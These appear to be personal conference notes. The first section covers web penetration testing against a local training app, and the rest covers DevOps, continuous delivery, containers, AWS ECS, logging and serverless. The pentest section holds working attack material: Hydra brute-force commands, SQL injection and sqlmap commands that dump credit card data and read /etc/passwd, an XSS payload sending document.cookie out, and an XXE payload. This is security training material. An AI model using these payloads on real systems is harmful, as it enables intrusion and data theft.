A/B Testing - Two groups of users (A and B) interact with different versions of the app (e.g. Design is different). The version with a better conversion rate wins.
http://christian-schneider.net/downloads/Toolbased_WebPentesting.pdf FindBugs + FindSecurityBugs - Plugins in Eclipse
CVE-ID - One vulnerabilty in a CVE registry. It includes a score CVEDetails.com - Publicly known vulnerabilites e.g. Tomcat 7.0.61: https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-887/version_id-190760/Apache-Tomcat-7.0.61.html
- Search by version numbers
exploit-db.com Exploits with code ready to use (i.e. a python code snippit to trigger this vulnerability)
exploits.shodan.io
Scans the WebServer Checks for vulnerble files
> nikto -h http://localhost:8080
Exceutes tousands of HTTP requests to check weather there are vulnerable stuff (not exploiting -> rather fingerprinting)
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 127.0.0.1
+ Target Hostname: localhost
+ Target Port: 8080
+ Start Time: 2017-06-12 04:19:37 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Server leaks inodes via ETags, header found with file /examples/servlets/index.html, fields: 0xW/7139 0x1427457886000
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
+ 7677 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2017-06-12 04:19:52 (GMT-4) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
- THE Pentestesters/Hackers IDE
- Local Proxy Server -> Configure any kind of web client (i.e. browser) -> All this traffic emited by this client goes through this proxy
- Proxies HTTP and HTTPS traffic
- Sniffs the network
- Intercepts Web traffic
- Put us into command to better attack the server
- We can also route this proxy with our smartphone (inspect mobile apps talking to a backend REST-API)
- Intercepting Proxy
- There is a Plugin for ZAP to import a Swagger definition file: zaproxy/zaproxy#2034
- Change the Port to another port (Tools > Options > Local Proxy): 4711
- Set Proxy in Firefox (empty the "No Proxy for" stuff)
- Request to our webserver
- See the requests in ZAP
- Toggle to intercepting Mode (Breakpoint mode)
- Request to our webserver
- Go to the Break tab
- Change the payload of the request in this tab
- Hit "Go to next Breakpoint" (Play button)
- Hit "Show hiden fields" (lightbulp) - Shows all hidden fields in the webbrowser
Passive Scan Mode (default as it is invasive)
- Tab "Alerts"
- Shows possible vulnerabilites
- Attacking while traversing through the application
- It automatically injects SQL + XSS stuff and permutates on every input vectors in each request
- There is a Jenkins Plugin which executes a ZAP Active Scan in a headless mode
- You can export a HTML Report of the active scan
- Right Click in ZAP on the Site: Add to Context > Add to default context
- Now the site has a target symbol
- Click ATTACK Mode (HINT: Now you are in "Scan as you surf"-Mode)
- Now it is attacking (in the Active Scan Tab)
- Now click on a Link on the webpage
- Now it scans this new site
- When you go to the previous site it doesn't get scanned again
Active Mode Settings
- Scan Policy - How deep should the scan reach (Analyze > Scan Policy Managers)
- Active Scan Input Vectors - (Tools > Options)
Plugins
- Advanced SQLInjection Scanner (derived by SQLMap) --> Every active scan includes this SQLMap stuff
- http://www.arachni-scanner.com/
- CLI
- Not part of Kali Linux by default
- Point to your test system and let it run
- Ruby based
- can serve a UI
- Provides a headless PhantomJS based browser cluster (takes a lot of resources)
- A scan takes long (so execute it only in a nighly build)
- It is better at spidering JavaScript based apps than ZAPs spider
- You can provide a login script
- Nice HTML Report
- CLI-Tool
- Services inside Hydra: Bruteforcing those services
- Bruteforce with a password list as a seed
- There are password lists inside of Kali Linux: /usr/share/wordlists/rockyou.txt.gz
- Or on GitHub: danielmiessler/SecLists
- Login request on our site (proxied through our ZAP)
- Take a look at the request in ZAP
- Use the form input fields on the request header as our seed
- Use top-pw-cracking-list.txt
- > hydra
hydra -t 4 (number of threads running) -f (stop on the first finding) -l admin (user to bruteforce) -P top-pw-cracking-list.txt (pw list) localhost (host) -s 8080 (port) http-post-form (service) "/marathon/secured/j_security_check: j_username=^USER^%j_password=^PASS^: Wrong"
Wrong is the expected response body
> hydra -t 2 -f -l admin -P top-pw-cracking-list.txt localhost -s 8080 http-post-form "/marathon/secured/j_security_check:
j_username=^USER^%j_password=^PASS^:
Wrong"
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-06-12 05:31:37
[DATA] max 2 tasks per 1 server, overall 64 tasks, 1001 login tries (l:1/p:1001), ~7 tries per task
[DATA] attacking service http-post-form on port 8080
[8080][http-post-form] host: localhost login: admin password: password
[STATUS] attack finished for localhost (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-06-12 05:31:38
- Java: Easy to fix with prepared statements
Possible Injection Strings
- '
- or 1=1 --
- and 'a'='a
- etc. quoted and unquoted
Boolean Blind test (to an unquoted SQL-Injection -> No ' is needed)
- Request to http://localhost:8080/marathon/showResults.page?marathon=2
- Request to http://localhost:8080/marathon/showResults.page?marathon=2 AND 1=1
- Request to http://localhost:8080/marathon/showResults.page?marathon=2 AND 1=2
Within the Code with the String concatenated SQL query
- marathonId is "tainted" as it comes from the outside
- finishedFilter isn't "tainted"
Find out table and column names
- By selecting meta tables/views (i.e. PG_TABLES in PostgreSQL)
- By using UNION
- SELECT ... FROM ... WHERE UNION SELECT ... FROM ... WHERE ...
- Prerequites for our UNION
- Same number of columns that the original SELECT has
- Same datatypes that the original SELECT has
- Use null because null is datatype independent: SELECT null, null...
- The Resulting Injection String: UNION SELECT null, null, null FROM information_schema.columns WHERE table_schema='PUBLIC'--
- Use the "--" at the end to comment the rest of the query out
- Shifting a String 'X' around in the select until we find a String is ok for that column as a datatype: UNION SELECT 'X', null, null FROM information_schema.columns WHERE table_schema='PUBLIC'--
- When we found a matching column: Get the column datatype and the column name by inserting the following instead of the 'X':
- ???
- We can select the credit card numbers with the following:
- UNION SELECT credit_card_number, null, null FROM information_schema.columns WHERE table_schema='PUBLIC'--
- When we found a matching column: Get the column datatype and the column name by inserting the following instead of the 'X':
- Determine table names or other columns values by using db timings with ASCII() and Sleep() functions and CASE WHEN within the WHERE statement.
- If the first char has an ASCII number lower than 100, then sleep 3 seconds. When the requests now runs 3 seconds you know, that the first char is an ASCII char between 0 - 100. Thereby we can determin the exact char.
sqlmap
- CLI
- Perfoms checks (timebased as well)
- Does all the things above automatcally
- sqlmap --flush-session -u http://localhost:8080/marathon/showResults.page?marathon=2
- Tests if a certain request is injectable
- sqlmap --dbs -u http://localhost:8080/marathon/showResults.page?marathon=2
- ???
- sqlmap -D PUBLIC --tables --columns -u http://localhost:8080/marathon/showResults.page?marathon=2
- UNION trick: Grabs the results from the response and presents it nicely: Shows all tables with columns and its datatypes
- sqlmap --sql-shell -u http://localhost:8080/marathon/showResults.page?marathon=2
- Gives you an SQL shell: SELECT creditcard_number FROM runner;
- Select files from the filesystem (i.e. passwd)
- Create a table "mytemp" within the sql-shell
- Use PostgreSQLs CSV-Importing feature "copy from /etc/passwd" within the sql-shell
- Select the "mytemp" table within the sql-shell --> Now we can read the content of the passwd file :)
source - Source of malicous data. Everything coming from a request (input vector / what a attacker can modify) sink - You have 100% control over the arguments
Source finds a way into a sink --> Vulnerabilty
Taint Tracking - Trace the request from source to sink Taint Flow - ???
- Top 3 in OWASP Top 10
- With XSS we can do everything a user can do
Three Types of XSS
- Reflected XSS - Directly reflected in the browser after inserting a vulnerable String (Just one user interaction)
- Persistent XSS - The malicous code sits inside the db and pops up on every refresh
- DOM based XSS - JavaScript based
<img src="//localhost/myimg.png" onload=src="//localhost/log.jsp?value="document.cookie</img>
HttpOnly - Can be set on cookies so that they can't be read by (malicous) JavaScript
Escape out of an attribute (i.e. title)
<button title="Inserted the value of 2">Back</button>
<script>alert(1)</script>
would result in:<button title="Inserted the value of <script>alert(1)</script>">Back</button>
- But with
"><script>alert(1)</script>
it result in:<button title="Inserted the value of "><script>alert(1)</script>">Back</button>
- Ruby based tool
- Browser Exploitation Framework
- Abuse XSS vulnerabilites
- Provides a UI (with Ext JS)
- Victims browser sets up a WebSocket connection to the Beef server
- The attacker sees the online clients in the UI
- The attacker can executes stuff on the client + read values out of forms etc.
- openbugbounty.org
- Publicly known XSS vulnerabilites of websites
Uploading an XML file
- Include an inline DTD to the XML --> The XML parser reads the /etc/passwd file and shows writes it to the XML:
<!xml ...>
<!DOCTYPE test [
<!ENTITY cool SYSTEM "file:///etc/passwd">
]>
<myType>
&cool;
</myType>
- Best Practices how to Pentest
- Top 10 Vulnerabilites
- Non-Profit organizatiion
- They are providing an "Intercepting Proxy" OWASP-ZAP (already inside Kali Linux)
- HTTPS everywhere
- Don't mix Data with Code (i.e. String concate a SQL query with variables inside)
- Don't store files uploaded by users in the filesystem --> Use the DB with Lobs instead
10:15 - 11:15 (SAAL MARITIM B/C) - Challenges in Release Management for complex and highly regulated Environments
What drives DevOps?
- We have to be faster than before
- Cloud
- Multi-Channel (i.e. Voice-Channel: Alexa)
- Time-to-Market (automated release approach)
Complex dev environment
- A lot of agile teams
- Separate release streams
- Different technology stacks with different tools
- Dependencies between applications
Regulations
- PCI - WHAT!?
- SAE - WHATTTT
- FDA - Hmm?
- Automotive Spice - WTF?
Core Principles
- Traceability
- Responsibility
- Audit-Save - Not changeable
What do we have to do?
- Efficient delivery framework
- Make the toolchain changeable (i.e. does your Toolchain support serverless in the future)
- Higher agility (i.e. Product Managers have to work more agile)
- Communicate successes/achievements inside of the company (i.e. Testers didn't know that there is an automated provisioning system for test platforms)
Requirements on our toolchain
- The pipeline process has to be visible
- Dependency Management
- Quality Gates
- Cross Pipeline reporting
- ...
Problem: 300 - 400 Tasks vom Stages from dev to prod
5% from 1.000.000 deployments reach production
- Why? Because they missed quality Gates in the pipeline
How to do it with so many tools?
- Dev > Build > Integrate > Test > Release > Deploy > Operate
- What is the market leader to do all these things
- Most companies do it with an Excel list (document the Release Process with start/end dates, durations, team members for each individual application)
- They require weekly + daily release meetings
- The Release Manager asks you: Is this or that done yet? - No because we have to wait for another person outside of the team to do stuff
- Most companies do it with an Excel list (document the Release Process with start/end dates, durations, team members for each individual application)
- Integrate everything in the release process
- Change Management DB - What has been released etc.
The Big Picture
- Release Pipeline Diagram
- Two different Artifactories for intern and production
- ...
AWS + CloudFoundry + OpenStack
- Pipeline
- -> Internal Cloud (CF + OpenStack)
- -> AWS
- -> ...
Pipeline for a Pipeline
- Development Pipeline --- All pipeline changes are tested first ---> Production Pipeline
Self service onboarding (What?! :D)
- Diagram
- Developers
- -> XL-Release (AppName, GitHub Repo, etc. provided by the developers)
- -> Pipeline
- -> XL-Release (AppName, GitHub Repo, etc. provided by the developers)
X-File - A Groovy DSL to define your Release Pipeline by XL-Release
- Defines Phases
- Has a Task (i.e. to wait for something (QA))
- Has Dependencies
XL-Release profides a Web UI
- A Board for a Release (Flow - For Business People)
- A calendar with planned releases and their dependencies (i.e. sb has to install a test system on a machine)
- This UI tries to replace an Excel Sheet
- It also tries to replace E-Mail
- Compliance
- Rights Management (Who can start/abort a release etc.)
- Auditing
- Reporting - Who did what?
- Traceability - Where are we in the release process?
How to deploy
- Deploy to a cluster
- Make a smoke test
CD Books tell you: When there is an error -> Don't fix the symtoms -> "Press the red button" -> Fix the source of the error -> Retrigger a new deployment
Customer: RBB
- rbb-online.de
- rbb24.de
- Problem: Millions of requests on the news page (Beim Terroranschlag)
- --> Buy new HW or go in the cloud
- There are High Peaks on the "Sandmann - Webpage" on the Sandmann show running in TV
- They shifted in the OTC
Load Testing with Monitoring
- CLI Monitoring Tool: Taurus
- Visible as a graph in the CLI
- 20 concurrent users
- 20 active users
- nload - CLI Tool that monitors the current network traffic (In and Outgoing) on the console
- Jenkins Slave on the OTC triggers the Load Test
- Produces an XML Report with a Graph of all the instances running over time
Taurus
- CLI tool
- Can trigger JMeter
- Configure in YAML file --> ??? Does it produce a JMeter config ???
- Define concurrent clients firing requests
- Define scenarios
- Requests to http://...
- Define Reporting
- Define Criteria when to fail the test (i.e. max response time)
- Tests an Auto Scaling Group in the OTC
JMeter
- Don't use GUI mode for load testing
- There is a headless mode to run the load test
- Configuration + Scripting is bad in the GUI, better do it with Taurus' YAML file
OTC - Based on OpenStack
- Auto Scaling
- Multiple Groups
- With multiple Instances
- Multiple Groups
- Hosted in Magdeburg and Biere
RBB
- Images are built on the OTC with Ansible via Jenkins and are published in a private registry
- Automated Load- and Performance Testing
- Webcaching Layer on OTC
- HAProxy
OpenStack
- Growing echo system
Pets vs. Cattle - ???
Jump Host - ???
VPC - ???
ECS - Elastic Cloud Server
- Name
- Type
- Number of vCPUs
- Memory
- Image Type
- Image
- Network
- Which VPC
- IPs
Public Images (Latest OS Base Image) -> git Repo (managed by DevOps Team) -> Development VCS (Temp. Server v1) -> Private Images (Custom Server Image v1) -> Production VCS (Ephemeral Server v1)
Automated Testing
- Change to the Code (Git checkin)
- Pipeline is triggered
- Image is created
- Functional Image is created
- Image is deployed on the OTC
Overview
- Jenkins Master in Customer Site
- Git Repo in Customer Site
- Jenkins Slave in VPC
- A VPC for Testing
- A VPC for Production
Rolling Update (Updates without any Downtime)
- Change the config in one Auto Scaling Group
- A new instance with the new config is starting up
- Now two instances are running in the same Auto Scaling Group
- The new instance shows the new content
- Trigger the down-scaling in the UI
- Now only the new version is live
ING (Bank)
The last agile mile
2012
- Commerce
- Application dev
- Applicatino ops
- Infra dev
- Infra ops
2013
- Commerce
- Agile / Scrum
- Application ops
- Infra dev
- Infra ops
2014
- Commerce
- DevOps (CD) 118 Teams
- Infra dev
- Infra ops
2015
- BizDevOps (Tribes & Squads) 400 Teams
- Infra dev
- Infra ops
2016
- BizDevOps (Manual IT Risk + Private Cloud)
- Infra ops
IT-Risk
- Policy
- Principle
- Control Framework
- Pipeline
Principles
- Speed - No longer fill out forms
- Outcomes over Impositions
- Outcome - Not a filled in form, but meetings
- Shift-Left - Nobody patches apps in production without going through QA
- Human vs. Robots
- Immutable Servers
- Cattle and Pets
- Pet - Server in Prod -> Go to the doctor when its sick
- Cattle - Get another one when it is sick
- Infrastructure = Code
- Robots = software
- Humans leverage automate pipelines
Learning organization
- Weird assumptions about the roles of a software engineer
- Designer
- Coder
- Tester
- Deployer
- Requirements Specifier
- Solution Architect
- ...
- ING changed HR
Complex Apps are best managed with Feedback loops
Feedback Loops
- Need to be designed
BizDevSecRiskOps
- Shift Left
Twitter: @henkkolk
They moved from Jenkins 1 to Jenkins 2 with CD
Contious Delivery vs Contiious Deployment
- Continous Delivery - Before Production (you can do this by merging in master branch, build your artifact, but can not go in production)
- Continous Deployment - Go in Production
Diagram
- Handler (Entry Point: It is time to do st.) (i.e a git merge)
- VM or Container that is clean and is similar to your production system: A place to run your tests
- Tests failed - do something (i.e. open an issue)
- Tests ok - do something
Continous Delivery
- Increase the number of releases
- Build > deploy code in a safe env > run test > deploy
Continous Integration
- Integrate new code in the old code: is the new code compliant to the old code
- Run security tests in this phase
- GitHub let Jenkins check wheather the new code is compliant (merge button is disabled when it is not)
Why use Continous Delivery?
- Stay focused on Business
- Reduce human errors - circle that repeats over time (we as human are not good at those tasks -> boring)
- Configure Jenkins to send notififactions to your communication channel of choice (i.e. Slack, Telegram or E-Mail)
- Keep developers focused
Terminology
- Release
- Artifact/Artefact
- Pipeline - Tunnel that our code follows from the VCS to the environment (Define it via a Jenkinsfile)
- Continous delivery
- Continous Integration
- Continous deployment
- Rollback - Deploy can fail / can break the system. Hard topic. When st breaks: start from the beginning of an old version of git (Complex systems: Snapshots)
- CI server - Jenkins
- Job - Single Pipeline that starts when code is merged
Unique Pipeline
- Has to be unique
Speedy
- Make your pipeline fast (i.e. split your pipeline / parallelize your pipeline)
- Smoke tests when merge to master parallel to static analyzation the code
Reproducible
- You can reproduce the env on your local environment
Versionable
- Change is lost in Jenkins when someone comes along and changes the settings of a Jenkins job --> Bad.
- Jenkins Pipeline Plugin - Pipeline "Hascode"???: Put a file in your VCS that updates the settings via a git merge. It grows with your application (It is comfortable to rollback)
Track! Track! Track!
- Monitor the productivity and mark your important steps
- Mark a deploy to understand the changes
- Red vertical lines in a graph which (Grafana) marks a new deploy to see how a new version behaves (compare it in an easy way)
- Organize a party :D
Communication Layer
- Goal: Keep Guys out of Jenkins
Create Strong integration
- Work hard to maintain your pipeline efficient
Staging Environment - Improvements
- 4 Environments
- A new PR is opened
- Job: PR Checker (3 minutes)
- Periodic Job that runs the unit tests with code coverage (split it with PR Checker to have the pipeline fast) (18 minutes)
- Merged to devlop
- Job: Artifact Creator Job - Creats the artifact
- triggers: Job: Staging - Copies artifact + start secondary tomcat
- Job: Artifact Creator Job - Creats the artifact
- Testing begins
- Post Staging Acceptance
- Job: Deploy Pre Production (1 minute)
- Testing Complete
- Job: Release to Production (25 sec)
- Sanity Checks Complete
- Job: Merge (2 minutes)
- Job: Release
His Workflow
- Merge feature branch to develop
- run unit test + run static analysis + docker build + deploy to acceptance
- merge develop to master (if 2. is working)
- run unit test + run static analysis + docker build + deploy to production
His Opimizations to his workflow
- Merge to master and use the same docker image in dev and prod
- Snapshot rollback
Jenkis Server is the unique door to release to production
- monitor - Monitor your servers
- logs - tail logs
- recovery - jenkins can fail --> Have a recovery system
- HA -
- scalability - Jenkins support multi node environment with Jenkins workers (scale your jenkins by adding new nodes)
- ❤️ your CD process
Backup / Restore policy
- What happens during disaster?
- Are we able to recover?
- He backups JENKINS_HOME excluded plugins
- There are plugins for that but he uses scripts to do it
Pipeline as code
- Groovy DSL
- Script it rather than configure it in the jenkins UI
node {
stage("Checkout") {
git branch: "master",
credentialsId: "github-asdf",
....
}
}
Trigger a build with Hubot
- Built by GitHub
- Chat with the robot. It takes the message and deploys it
- JavaScript + NodeJS
- Slack has a public protocol
Blueocean
- New UI for Jenkins
- It is a plugin for Jenkins
- New fancy way to manage pipelines
(Jenkins) Plugins as code
- It is not easy to do
- Specify a list of plugins that you need
- Bash Script: install-plugins.sh (look it up on GitHub)
- Reads the file with all the plugins that you specified and installs them in Jenkins
- Problem: Plugin Versions
@gianarb http://gianarb.it
16:45 - 17:45 (SAAL MARITIM B/C) - Continuous Delivery with Containers: The Good, the Bad, and the Ugly
OReilly Book: "Containerizing Continous Delivery in Java"
Containers + CD
- Push st. (Container Image) down the pipeline that has to be the same (no veriations)
- Adding meta data to container images is vital
Continous Delivery
- Book "Continous Delivery"
- Not "necissarily" Continous Deployment
- A Build Pipeline is mandatory
- DEV > QA > STAGING > PROD
Containers + CD
- Container image == 'single binary' - the single thing that gets down the pipeline (like a .war)
- Impacts QA (no longer pulling down a .war or .jar) and Production
Pipeline for Containers
- Local should be like produciton as possible
- Locally use same Image like in production (Alpine vs. CentOS etc. --> Decide!)
Telepresence
- Tool when working with Kubernetes
- Work locally and running on a cluster
Hoverfly
- Tool to mock out APIs
- Doing this by recording or simulating traffic
- Synthetic APIs to work locally
Dockerfile (super important) - ??? One Dockerfile for local development and production ???
- OS choice
- Configuration
- Build artifacts
- Exposig ports
- Language specific stuff
- JDK vs JRE + Oracle vs OpenJDK
Different Test and Prod Containers?
- DB in the Test Container
- Better use "test sidecar container" with all the other tools that use need (Selenium etc.) - Look up the Blogpost on this slide!
- Docker multi-stage builds - Interessing Idea
Building images with Jenkins
- CloudBee has nice OpenSource Plugins for Jenkins to build Images
Storing in an image registry
- DockerHub
Metadata - Adding data as it goes down the pipeline
- Who built it etc.
- Version your Images
- "Latest" Tag in Docker
- HINT! It means the last build tag that run without a specific tag/version specified!
- DONT USE LATEST: Everytime version it with a version
- Application Metadata
- Version (semver)
- GIT SHA
- Build metadata
- build data + image name + vendor
- ...
- QA control
- Security audited
- Adding Lables at build time
- Docker Lables
- Labelling (look it up on GitHub)
- Create file '/hooks/labels'
- You can add data on build time
- label-schema.org
- microbadger.com
- Adding Labels at runtime can be done...
- docker run -d --label (that will commit the label in the docker image --> but it does create a new image)
- Best solution: A registry with metadata support: JFrog Artifactory or NexusOSS (Modify the metadata in the registry rather than in the image itself)
Component Testing
Testing: Jenkins Pipelines (as code with a Jenkinsfile --> Creates the Job out of this file)
- Baked into jenkins
- node { stage("asdf) ... }
- Stages are shown in Jenkins
Testing individual containers
node {
stage("asdf") {
docker.image()....
waitFor... // wait 30 until /health endpoint returns "UP"
}
}
Docker Compose + Jenkins Pipeline
node {
stage('end-to-end tests') {
...
sh docker-compose ...
}
}
Testing NFRs has to be in the build pipeline!!!
- Performance + Load testing
- Gatling (Scala based DSL: Better than JMeter) / JMeter
- Flood.io - commercial product takes your Gatlin Script and spins up Amazon Machines
- Security testing
- Findsecbugs / OWASP Dependency Check
- Bdd-security (Wrapper around OWASP ZAP) / Arachni (More JavaScript Pen-Testing tool -> Covers the basics)
- GauntIt / Serverspec
- Docker Bench for Security / CoreOS Clair
Delaying NFRs to the "Last Responsible Moment"
- "We are agile" so we can implement security checks and stuff later... --> WRONG!
Mechanical sympathy: Docker and Java
- JVM takes half of the RAM of the machine (doesn't work in a Docker container)
- Memory Problems
- Container 2GB Memory == Heap 2GB Memory...No, Don't give all the RAM to one container!!!
- Entropy Problems (when no periphical device is plugged in --> It cannot generate random security stuff in Java)
- TEST those Things in your Pipeline!!!
Observability is core to continous delivery
- READ! InfoQ: The Challenge of Monitoring Containers at Scale
Containers are not a silver bullet
Container Platform
- OpenShift is nice for that
- Book: Infrastructure as Code
Summary
- Continous Delivery is vital
- Container Images must be the single source of truth within pipeline
- Metadata added in the pipeline
- Mechanical symphaty is important
- ...
Books
- Continous Delivery
- Building Microservices
- Microservices
- More Agile Testing
- ... look them up on the slides
DevOps Weekly Newsletter
@danielbryantuk
ECS Cluster
- Includes Container Instances with an ECS-Agent (Docker container as well)
- ECS-Agents communicate with AWS to start new instances if needed
ECS Cluster - Deployment Options
- AWS Console
- Easy to start
- UI on the Website
- AWS CLI
- Not easy to start
- Automation is possible
- A script can get complicated an very verbose (not what we want)
- ECS CLI
- It is easy to start
- Automation is possile
- Via one command a cluster is up
- But use not in production
- Cloud Formation
- YAML File -> Send this to the CF Service -> Does the things that need to be done
- Changes to this File result in the required changes
Parameters: KeyName: ... Resources: ECSCluster: ... ECSAutoScalingGroup: ... ... ...
ECR - The Docker registry in the AWS
The first deployment
- Describe the container on first deployment
- Image
- Port mapping
- Mount points
- Network options
- Docker options
- Task Definition - Contains Containers
- IAM Task Role ???
- Volumes
- Network Mode
- Task Placement Constraints
- Service Description - Contains a Task
- Loadbalancer
- AutoScaling - Based on metrics: Please scale up etc.
- Deployment Configuration
- Task Placement Strategy
ECS CLI can consume a Docker Compose File that generates a Task Definition based on that
Load Balancing
- Static Port Mapping in the old Loadbalancer (ELB) (Not the best solution for containers)
- New Loadbalancer (Application Load Balancer (ALB)) - Only HTTP - Define Rules etc.
- Provides Dynamic Port Mapping
Scaling (Up & Down)
- CI1
- T1
- T2
- T3
When an alarm happens (In the Task Definition): Scale up
- CI1
- T1
- T2
- T3
- CI2
- T4
AutoScaling: Rule of Thumb
- Threshold = (1 - max(Container Reservation) / Total Capacity of a single Container Instance) * 100)
One Metric to scale them all
Node Draining
- Is needed when a new version of the application is available
Best Practices for Continous Delivery
- ASG UpdatePolicy: Wait for resource signals
- cfn-init: Ensure Docker and ECS-Agent is running
- UserData: Use build number to enforce new EC2 instances
Volumes
- Not supported or built in :(
- 2 Options: EBS and EFS
- EBS - No automatically scaling
- EFS - Elastic File System - It scales automatically - Pay what you need
Security
- IAM Security Roles
- iam.cloudonaut.io
ECS-Agent creates Tasks and talks to them via iptables
- Tasks shouldn't connect to the Metadata service
What is missing here?
- Monitoring
- ...
His wishlist for AWS
- Support all docker features (i.e. HEALTHCHECK)
- SecurityGroups for Containers
- Support Volumns natively
- ...
boards.greenhouse.io/scout24
@pgarbe
Netflix provides a client.jar for other services
- So they can reference it in their build.gradle file as a dependency
- This client.jar has dependencies as well and pulls them in the current service
Netflix uses Artifactory from JFrog
Solutions to the version problem
- deal with it
- share nothing or little
- Monorepo
- all code in a single repo
- no versions
Netflix' approach to this problem
- Astrid - Checks from artifactory which project uses which dependency in which version
- Niagra - pulls in the new version of a jar to all the dependent projects an checks wheather there is a break in those projects
- When a project is ok with the new version, niagra updates the version of this dependency in this projects VCS and triggers a build pipeline to check wheather it works --> Then a PR is getting issued on those projects
@sonofgarr
Centralized Log Management - Receiving the Log in raw format and save it first
- Where do you store your logs from your application (Log4j etc.) --> Configure them to write to files / stdout --> Docker is a change as it writes to stdout and stderr
- Logformat: Human readable, but we want to have structured data
- How to get structured date with human readable format?
- Logshippers do collect files
- Log Parsers use regexps to parse the logs
- When structured we can put it to ElasticSearch
- Bulk Indexing with ElasticSearch
- After Indexing the logs are searchable
Server/Container/App -> Log Shippers -> Centralized Log Management / Logsene
Monitoring
- similar: even more tools are involved
- Collect the metrics periodically and ship them to a backend -> Time Series DB
Server + App /Container Configuration -> Monitoring Agents -> Time Series DB -> Dashboard Tools, Alerting Tools, ChatOps Tools
Time Series DB
- find the minimum value over time
On Top on Time Series DB there are visualization tools
- i.e. Graphana / Kibana
- Slack Channels for Alerting
Decision in the first place
- bound to the Time Series DB
Nice Diagram of "Logging Features" with a lot of tools! Look it up in the slides!!!
Kubernetes
- Pod - One or multiple Containers
- 1 Pod with 2 Containers (i.e. Kibana + ElasticSearch) --> Both on the same Host (communication via localhost ports) --> ReplicationController: Does the Job of
- Services: Entry Point via the network to the server (similar to exposing port in docker) -> goes over the load balancer
- AutoScaling
- CLI Tools for it (easy to setup an ElasticSearch Cluster)
Kubernetes Dashboard / Heapster
- Real time information
- Heapster: real time API --> Provides Performance Metrics for every pod and container
docker stack deploy (distributed containers) --> swarm creates an overlay network (can run on different hosts --> this is not possible in Kubernetes)
Kubernetes != Swarm
- Kubernetes has much things to learn
- Kubernetes better for larger companies with more teams
Docker Logging
- Docker Logging Drivers
- Drivers are set up by Kubernetes
- From Docker: other Options as a Logging Driver:
- JournalD, etc...
- Default: JSON --> works
- If using syslog as driver: doesn't save the logs locally (it has no buffer -> Risky: prefer Filedriver and forwarding them!!!!)
- docker logs container_id
- docker logs container_name
- Syslog Driver:
- docker run --log-driver=syslog ...
- Add Context in the docker run command with --log-opt (ImageName, etc.)
- More fun with TCP logging drivers:
- docker logs syslog
- Splunk Logging Driver
- Alternatives to improve the situation of problematic logging drivers:
- Logs as JSON
- When ElasticSearch or syslog server is not available: Have an (smart) Agent that buffers the logs (Disk Buffer)
- Log Agent - something like logstash
Tagging of logs metrics and events
- Automatic tagging with:
- Docker
- container name
- image name
- labges / environments
- host name + ip (on which node is the container running)
- kubernetes
- pod name, UID, namespace
- Swarm
- swarm service name, id, compose project, container # scale
- Docker
Container Metrics Collection
- docker stats ${docker ps -q}
- Monitoring Agents use this metrics and ship them to the backend
LogRouting: For Teams: Label their containers with an Index
Integrate application monitoring in the stack
- Service Discorery
- etcd
- Consul
- or API's
Docker --run -> App Container (config to expose metrics) <-- App Monitor <--Automatic Run-- Docker Monitor <--discovery-- Docker
Key Container Metrics
- Node Storage - Good Docker OPS clean up their disks by removing the unused containers --> Alarm for Disk problems is important
- Number of containers per host - verify deployment strategies
- CPU quota per container - when we run more container on one node (limit them)
- Container memory and OOM counter - tune your app memory stuff like you do it for your container (JVM arguments have to match)
- Docker Events - Network connects, docker pulls, (auditing: what happend during the deployment process of the container -> which container was deployed in which version in which time?)
- Swarm Task Task - (Only for swarm) Pending Tasks
Limit container resources for your apps
- Set cpu quotas with: cpu-quota=6000
- limit Memory an configure app in container to the same limits!
- disable swap: ???some option???
- ...
Automatic Deployment of monitoring Agents
- One command to run a service on each node joining the cluster
Swarm3k - Experiment with Docker Swarm (The community provides nodes to the swarm)
Logs have to be rotated so that the disk doesnt get full
In Java exposing the JMX interface
Summary
- Setup of monitoring and logging is complex in dynamic environments!!!!
- Smart Agents to collect, parse, etc. logs!!!
Current State of DevOps
DevOps Pipeline today
- VCS > CI > CD (Delivery + Deployment) > Production
Book for Unit Testing: "Growing Object-Oriented Software, Guided by Tests"
Pipeline State UFO - A Lamp that indicates the current pipeline state :D
Production
- Regression Tests
Book: "Building Microservices"
Platform-as-a-Service
- Kubernetes, ...
Open-Source
- Logging
- ELK
- Call-Tracing
- AWS X-Ray, Zipkin
- Monitoring
- Infrastructure: Nagios
- For single technologies: java, ...
- Charting and dashboarding
- Grafana
- Kibana
@MartinGoodwell
@jpaulreed
Serverless - Like | in Unix
- (re)volution of the cloud
- Don't operate on Server level --> We operate on functional level
- Abstraction of the runtime
- Costs scale with usage --> never pay for idle
- No Server/container/process management
- auto-scale/auto-provision
- global availability
Abstractions
- Bare Metal
- IaaS
- PaaS
- Functions
Function-as-a-Service
- is event-driven
Backend-as-a-Service
Use cases
- Data Processing
- Back-end services / web apps / IoT
- Infrastructure Automation
Challenges
- Functions are like microservices but smaller
- Monitoring + Logging
- Debugging + Diagnostics
- Local Development
- vendor lock-in
- Latency + Cold start
Providers
- AWS
- Azure
- ...
AWS - Lambda
- Runtimes
- Node.js
- Java
- Python
- C#
- Events
- ...
- Monitoring + Logging
- Logs + Metrics pushed to CloudWatch
- ...
- Debugging + Diagnostics
